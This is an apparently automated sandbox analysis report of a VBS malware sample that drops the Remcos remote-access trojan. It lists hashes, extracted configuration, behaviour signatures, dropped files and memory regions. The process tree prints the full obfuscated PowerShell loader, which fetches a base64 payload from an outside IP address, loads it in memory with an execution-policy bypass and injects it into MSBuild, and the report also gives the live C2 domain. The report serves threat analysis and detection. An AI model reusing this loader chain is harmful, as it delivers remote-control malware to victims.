Analysis

  • max time kernel
    117s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250211-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250211-enlocale:en-usos:windows10-2004-x64system
  • submitted
    17/02/2025, 04:35

General

  • Target

    sostener.vbs

  • Size

    2.2MB

  • MD5

    60839811d24e7372196d54c2b210c653

  • SHA1

    f18bc8180225752cc50073a277423eab5ba0969e

  • SHA256

    109db0dac55368b1558ade61116654e1b32b971df09afd17b98c24b8153feb7c

  • SHA512

    747a057713c01f34bdaff2b872391e4198466d39ecb6ce9cec961091551a329a1a7347a0a6cd463e3a3a7362e85a4cc8079357937f0f7057d740300254b9d233

  • SSDEEP

    192:rzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzMzzzzzzzzzzzzzzzzzzzzzzzzw:tQqy8c4i6gaAc

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AD/dll.txt

exe.dropper

http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AD/dll.txt

Extracted

Family

remcos

Botnet

NEWD

C2

alemania2020.duckdns.org:8888

Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    registros.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-QIOMAY

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Capturas de pantalla

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Remcos family
  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\sostener.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4624
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT☹Hk☹cwB0☹GU☹bQ☹u☹E4☹ZQB0☹C4☹UwBl☹HI☹dgBp☹GM☹ZQBQ☹G8☹aQBu☹HQ☹TQBh☹G4☹YQBn☹GU☹cgBd☹Do☹OgBT☹GU☹YwB1☹HI☹aQB0☹Hk☹U☹By☹G8☹d☹Bv☹GM☹bwBs☹C☹☹PQ☹g☹Fs☹UwB5☹HM☹d☹Bl☹G0☹LgBO☹GU☹d☹☹u☹FM☹ZQBj☹HU☹cgBp☹HQ☹eQBQ☹HI☹bwB0☹G8☹YwBv☹Gw☹V☹B5☹H☹☹ZQBd☹Do☹OgBU☹Gw☹cw☹x☹DI☹Ow☹k☹Ho☹RgBL☹GE☹QQ☹g☹D0☹I☹☹n☹Gg☹d☹B0☹H☹☹Og☹v☹C8☹OQ☹x☹C4☹Mg☹w☹DI☹Lg☹y☹DM☹Mw☹u☹DE☹Ng☹5☹C8☹V☹Bh☹Gs☹LwBS☹GU☹Zw☹v☹E0☹YQBy☹Ho☹LwBE☹FI☹Rw☹v☹FI☹V☹BD☹C8☹QQBE☹C8☹Z☹Bs☹Gw☹LgB0☹Hg☹d☹☹n☹C☹☹Ow☹k☹Ek☹ZQBw☹Ec☹UQ☹g☹D0☹I☹☹o☹C☹☹WwBT☹Hk☹cwB0☹GU☹bQ☹u☹Ek☹Tw☹u☹F☹☹YQB0☹Gg☹XQ☹6☹Do☹RwBl☹HQ☹V☹Bl☹G0☹c☹BQ☹GE☹d☹Bo☹Cg☹KQ☹g☹Cs☹I☹☹n☹GQ☹b☹Bs☹D☹☹MQ☹u☹HQ☹e☹B0☹Cc☹KQ☹7☹CQ☹dwBl☹GI☹QwBs☹Gk☹ZQBu☹HQ☹I☹☹9☹C☹☹TgBl☹Hc☹LQBP☹GI☹agBl☹GM☹d☹☹g☹FM☹eQBz☹HQ☹ZQBt☹C4☹TgBl☹HQ☹LgBX☹GU☹YgBD☹Gw☹aQBl☹G4☹d☹☹g☹Ds☹J☹BS☹FY☹VQBY☹HY☹I☹☹9☹C☹☹J☹B3☹GU☹YgBD☹Gw☹aQBl☹G4☹d☹☹u☹EQ☹bwB3☹G4☹b☹Bv☹GE☹Z☹BT☹HQ☹cgBp☹G4☹Zw☹o☹C☹☹J☹B6☹EY☹SwBh☹EE☹I☹☹p☹C☹☹Ow☹k☹FI☹VgBV☹Fg☹dg☹g☹Hw☹I☹BP☹HU☹d☹☹t☹EY☹aQBs☹GU☹I☹☹t☹EY☹aQBs☹GU☹U☹Bh☹HQ☹a☹☹g☹CQ☹SQBl☹H☹☹RwBR☹C☹☹LQBF☹G4☹YwBv☹GQ☹aQBu☹Gc☹I☹☹n☹FU☹V☹BG☹Dg☹Jw☹g☹C0☹ZgBv☹HI☹YwBl☹C☹☹Ow☹k☹FM☹V☹Bm☹Ec☹b☹☹g☹D0☹I☹☹o☹C☹☹WwBT☹Hk☹cwB0☹GU☹bQ☹u☹Ek☹Tw☹u☹F☹☹YQB0☹Gg☹XQ☹6☹Do☹RwBl☹HQ☹V☹Bl☹G0☹c☹BQ☹GE☹d☹Bo☹Cg☹KQ☹g☹Cs☹I☹☹n☹GQ☹b☹Bs☹D☹☹MQ☹u☹HQ☹e☹B0☹Cc☹KQ☹g☹Ds☹J☹BN☹E8☹R☹BS☹Gc☹I☹☹9☹C☹☹I☹☹n☹CQ☹cgB5☹GE☹ZQBH☹C☹☹PQ☹g☹Cg☹RwBl☹HQ☹LQBD☹G8☹bgB0☹GU☹bgB0☹C☹☹LQBQ☹GE☹d☹Bo☹C☹☹Jw☹n☹Cc☹I☹☹r☹C☹☹J☹BT☹FQ☹ZgBH☹Gw☹I☹☹r☹C☹☹Jw☹n☹Cc☹I☹☹t☹EU☹bgBj☹G8☹Z☹Bp☹G4☹Zw☹g☹FU☹V☹BG☹Dg☹KQ☹7☹Cc☹I☹☹7☹CQ☹TQBP☹EQ☹UgBn☹C☹☹Kw☹9☹C☹☹JwBb☹EI☹eQB0☹GU☹WwBd☹F0☹I☹☹k☹EY☹eQBm☹GQ☹eg☹g☹D0☹I☹Bb☹HM☹eQBz☹HQ☹ZQBt☹C4☹QwBv☹G4☹dgBl☹HI☹d☹Bd☹Do☹OgBG☹HI☹bwBt☹EI☹YQBz☹GU☹Ng☹0☹FM☹d☹By☹Gk☹bgBn☹Cg☹I☹☹k☹HI☹eQBh☹GU☹Rw☹u☹HI☹ZQBw☹Gw☹YQBj☹GU☹K☹☹n☹Cc☹J☹☹k☹Cc☹Jw☹s☹Cc☹JwBB☹Cc☹Jw☹p☹C☹☹KQ☹g☹Ds☹Jw☹g☹Ds☹J☹BN☹E8☹R☹BS☹Gc☹I☹☹r☹D0☹I☹☹n☹Fs☹UwB5☹HM☹d☹Bl☹G0☹LgBB☹H☹☹c☹BE☹G8☹bQBh☹Gk☹bgBd☹Do☹Jw☹g☹Cs☹I☹☹n☹Do☹QwB1☹HI☹cgBl☹G4☹d☹BE☹G8☹bQBh☹Gk☹bg☹u☹Ew☹bwBh☹GQ☹K☹☹g☹CQ☹RgB5☹GY☹Z☹B6☹C☹☹KQ☹u☹Cc☹I☹☹7☹CQ☹TQBP☹EQ☹UgBn☹C☹☹Kw☹9☹C☹☹JwBH☹GU☹d☹BU☹Hk☹c☹Bl☹Cg☹I☹☹n☹Cc☹V☹Bl☹Gg☹dQBs☹GM☹a☹Bl☹HM☹W☹B4☹Fg☹e☹B4☹C4☹QwBs☹GE☹cwBz☹DE☹Jw☹n☹C☹☹KQ☹u☹Ec☹ZQB0☹E0☹Jw☹g☹Ds☹J☹BN☹E8☹R☹BS☹Gc☹I☹☹r☹D0☹I☹☹n☹GU☹d☹Bo☹G8☹Z☹☹o☹C☹☹Jw☹n☹E0☹cwBx☹EI☹SQBi☹Fk☹Jw☹n☹C☹☹KQ☹u☹Ek☹bgB2☹G8☹awBl☹Cg☹I☹☹k☹G4☹dQBs☹Gw☹I☹☹s☹C☹☹WwBv☹GI☹agBl☹GM☹d☹Bb☹F0☹XQ☹g☹Cg☹I☹☹n☹Cc☹TQBB☹EE☹dgBB☹Eg☹WQBB☹FE☹UQBC☹Eo☹QQBF☹DQ☹QQBi☹Gc☹QgBW☹EE☹RgBN☹EE☹VQBn☹EE☹dgBB☹Ec☹UQBB☹Ew☹dwBC☹Gw☹QQBH☹FU☹QQBM☹Gc☹QgBs☹EE☹S☹BR☹EE☹YwB3☹EI☹a☹BB☹Eg☹QQBB☹Ew☹dwBB☹HY☹QQBE☹G8☹QQBj☹Hc☹QgB3☹EE☹S☹BR☹EE☹Z☹BB☹EI☹bwBB☹EE☹PQ☹9☹Cc☹Jw☹g☹Cw☹I☹☹n☹Cc☹JQBK☹Gs☹UQBh☹HM☹R☹Bm☹Gc☹cgBU☹Gc☹JQ☹n☹Cc☹I☹☹s☹C☹☹Jw☹n☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹Xw☹t☹C0☹LQ☹t☹C0☹LQ☹t☹Cc☹Jw☹s☹C☹☹Jw☹n☹D☹☹Jw☹n☹Cw☹I☹☹n☹Cc☹MQ☹n☹Cc☹L☹☹g☹Cc☹JwBS☹G8☹Z☹Bh☹Cc☹Jw☹g☹C☹☹KQ☹g☹Ck☹I☹☹7☹Cc☹I☹☹7☹CQ☹VgBC☹Fc☹VwB6☹C☹☹PQ☹g☹Cg☹I☹Bb☹FM☹eQBz☹HQ☹ZQBt☹C4☹SQBP☹C4☹U☹Bh☹HQ☹a☹Bd☹Do☹OgBH☹GU☹d☹BU☹GU☹bQBw☹F☹☹YQB0☹Gg☹K☹☹p☹C☹☹Kw☹g☹Cc☹Z☹Bs☹Gw☹M☹☹z☹C4☹c☹Bz☹DE☹Jw☹g☹Ck☹I☹☹7☹CQ☹TQBP☹EQ☹UgBn☹C☹☹f☹☹g☹E8☹dQB0☹C0☹RgBp☹Gw☹ZQ☹g☹C0☹RgBp☹Gw☹ZQBQ☹GE☹d☹Bo☹C☹☹J☹BW☹EI☹VwBX☹Ho☹I☹☹g☹C0☹ZgBv☹HI☹YwBl☹C☹☹OwBw☹G8☹dwBl☹HI☹cwBo☹GU☹b☹Bs☹C☹☹LQBF☹Hg☹ZQBj☹HU☹d☹Bp☹G8☹bgBQ☹G8☹b☹Bp☹GM☹eQ☹g☹EI☹eQBw☹GE☹cwBz☹C☹☹LQBG☹Gk☹b☹Bl☹C☹☹J☹BW☹EI☹VwBX☹Ho☹I☹☹7☹☹==';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('☹','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\Admin\AppData\Local\Temp\sostener.vbs');powershell $Yolopolhggobek;
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2564
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AD/dll.txt' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll01.txt') ;$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''TehulchesXxXxx.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''MAAvAHYAQQBJAE4AbgBVAFMAUgAvAGQALwBlAGUALgBlAHQAcwBhAHAALwAvADoAcwBwAHQAdABoAA=='' , ''C:\Users\Admin\AppData\Local\Temp\sostener.vbs'' , ''____________________________________________-------'', ''0'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1780
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\Temp\dll03.ps1
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4452
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
            5⤵
            • Drops file in Windows directory
            • System Location Discovery: System Language Discovery
            • Modifies registry class
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:1012
            • C:\Windows\SysWOW64\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\yedmc.vbs"
              6⤵
              • System Location Discovery: System Language Discovery
              PID:3548
  • C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
    "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuNDMiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuNDMiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7RjU4MzVDODAtNUUxMS00OEU3LTlBNDEtNjcwNkNCQUMxREVCfSIgdXNlcmlkPSJ7NkE2RkNBOTEtNDM2NC00MzAwLUJEQUMtMDBGQjJCQUMxRDc2fSIgaW5zdGFsbHNvdXJjZT0ibGltaXRlZCIgcmVxdWVzdGlkPSJ7QjRGOTYwMDYtQkVBOC00Q0ZCLUI2MEQtM0VBREREQjREMTQ3fSIgZGVkdXA9ImNyIiBkb21haW5qb2luZWQ9IjAiPjxodyBsb2dpY2FsX2NwdXM9IjIiIHBoeXNtZW1vcnk9IjQiIGRpc2tfdHlwZT0iMiIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xOTA0MS4xMjg4IiBzcD0iIiBhcmNoPSJ4NjQiIHByb2R1Y3RfdHlwZT0iNDgiIGlzX3dpcD0iMCIgaXNfaW5fbG9ja2Rvd25fbW9kZT0iMCIvPjxvZW0gcHJvZHVjdF9tYW51ZmFjdHVyZXI9IiIgcHJvZHVjdF9uYW1lPSIiLz48ZXhwIGV0YWc9IiZxdW90O0UreGJBejZZNnNVMTI4OWJTNnFsNFZSTGJramZCVUdUTUpzanJIcjQ0aUk9JnF1b3Q7Ii8-PGFwcCBhcHBpZD0iezhBNjlEMzQ1LUQ1NjQtNDYzYy1BRkYxLUE2OUQ5RTUzMEY5Nn0iIHZlcnNpb249IjEyMy4wLjYzMTIuMTIzIiBuZXh0dmVyc2lvbj0iIiBsYW5nPSJlbiIgYnJhbmQ9IkdHTFMiIGNsaWVudD0iIiBpbnN0YWxsYWdlPSI1IiBpbnN0YWxsZGF0ZXRpbWU9IjE3MzkyODMzNzEiIG9vYmVfaW5zdGFsbF90aW1lPSIxMzM4Mzc1NDE5Mjc1MzAwMDAiPjxldmVudCBldmVudHR5cGU9IjMxIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIyMTc5ODYyIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI0OTU0NzYwNDU3Ii8-PC9hcHA-PC9yZXF1ZXN0Pg
    1⤵
    • System Location Discovery: System Language Discovery
    • System Network Configuration Discovery: Internet Connection Discovery
    PID:2212

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\remcos\registros.dat

    Filesize

    144B

    MD5

    11d0e8660e0213452105c87a565a6014

    SHA1

    bb3c76ed77cac7280173867cf57e39b7276c1133

    SHA256

    c0e548dcd9535f88c090434d7e7dce4bea3ad47d6e447aacb0456b3ed63a172e

    SHA512

    0573fef642a1457596f6dbd4c16630beecf77f7ed81b860d254c73c9ab852982c6e68b2014d7cbd151933f56f29f93a504ae071e72dce30025ec9a321971bfac

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    3KB

    MD5

    6bf07852cb3bab59e6cc2dcab43ab011

    SHA1

    310635401d2c6a1bd7f77df365eb6371012aee2c

    SHA256

    5d968265d8f24ff9f80784bc6f3b5af2437781bce2b3d850db4a2bb49d0b5ad7

    SHA512

    8dc9aec471dbd68818ed6fec05efc6570dbddbed22946765d45d4bd5482814e306674df3f3ca0845828fcc0d604d685fcec0f3f7ad9e982b30aaaa39d26134a9

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    0f6a3762a04bbb03336fb66a040afb97

    SHA1

    0a0495c79f3c8f4cb349d82870ad9f98fbbaac74

    SHA256

    36e2fac0ab8aee32e193491c5d3df9374205e328a74de5648e7677eae7e1b383

    SHA512

    cc9ebc020ec18013f8ab4d6ca5a626d54db84f8dc2d97e538e33bb9a673344a670a2580346775012c85f204472f7f4dd25a34e59f1b827642a21db3325424b69

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    64B

    MD5

    50a8221b93fbd2628ac460dd408a9fc1

    SHA1

    7e99fe16a9b14079b6f0316c37cc473e1f83a7e6

    SHA256

    46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e

    SHA512

    27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uo2gyytz.wrz.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\dll01.txt

    Filesize

    113KB

    MD5

    c1925884c1b9f7ee061a79a2f737814f

    SHA1

    7fa1f44803b718c7cdfea2bf8f68adf5aa4f5d4a

    SHA256

    38f4b05fba4a26639a39306b7d7404a9f45ec4699f72678251fc314e3417b21a

    SHA512

    3fddee4d8fbd4c3454e46bafa1d8eddc8acdd33bdccf55b6afbb27b41eac0c2fd5c0f4c370cd7ab443406df2326381182c73053c55540afd7fee211580b8a921

  • C:\Users\Admin\AppData\Local\Temp\dll03.ps1

    Filesize

    1KB

    MD5

    b68e5785fcca7cd9a12e8f8be89dc86e

    SHA1

    50ab1dfb5014011cad7928f37dbbd696f0ac5fa8

    SHA256

    43b784d184a438b61749119743daadc36a79bfe321c54f848dbb0743ba483bed

    SHA512

    8d81ea42ef7ac9b768227480aedd51057b933c9fc6149b405e2871682833760d20c162737039541b3e6f6691244e5d1f4c2fa66467821658b5b44c99336d94eb

  • C:\Users\Admin\AppData\Local\Temp\yedmc.vbs

    Filesize

    374B

    MD5

    92323d5eafdd057f2602a2a0b5f5230e

    SHA1

    9498775850b22af3303ce67d042c7cf3925b396b

    SHA256

    52512978ad3bd19b5bbc6a332b2cc7635947c9f29979f746f406161ffb3ac34a

    SHA512

    268d4fe79242535278a9ca3396d1e39f9be88285a4ea01304bd39415728e07e5d9b8392a778732ab3b65ab050aa6aa6aadf6f4d1443b39605763fc380637bb5c

  • memory/1012-55-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1012-68-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1012-84-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1012-40-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1012-43-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1012-47-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1012-79-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1012-77-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1012-76-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1012-69-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1012-62-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1012-44-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1012-61-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1012-60-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2564-12-0x00007FFA317B0000-0x00007FFA32271000-memory.dmp

    Filesize

    10.8MB

  • memory/2564-53-0x00007FFA317B0000-0x00007FFA32271000-memory.dmp

    Filesize

    10.8MB

  • memory/2564-11-0x00007FFA317B0000-0x00007FFA32271000-memory.dmp

    Filesize

    10.8MB

  • memory/2564-0-0x00007FFA317B3000-0x00007FFA317B5000-memory.dmp

    Filesize

    8KB

  • memory/2564-1-0x000001D9B0570000-0x000001D9B0592000-memory.dmp

    Filesize

    136KB

  • memory/2564-22-0x00007FFA317B3000-0x00007FFA317B5000-memory.dmp

    Filesize

    8KB

  • memory/2564-23-0x00007FFA317B0000-0x00007FFA32271000-memory.dmp

    Filesize

    10.8MB

  • memory/4452-37-0x000001FCE4160000-0x000001FCE4178000-memory.dmp

    Filesize

    96KB

  • memory/4452-39-0x000001FCCB070000-0x000001FCCB086000-memory.dmp

    Filesize

    88KB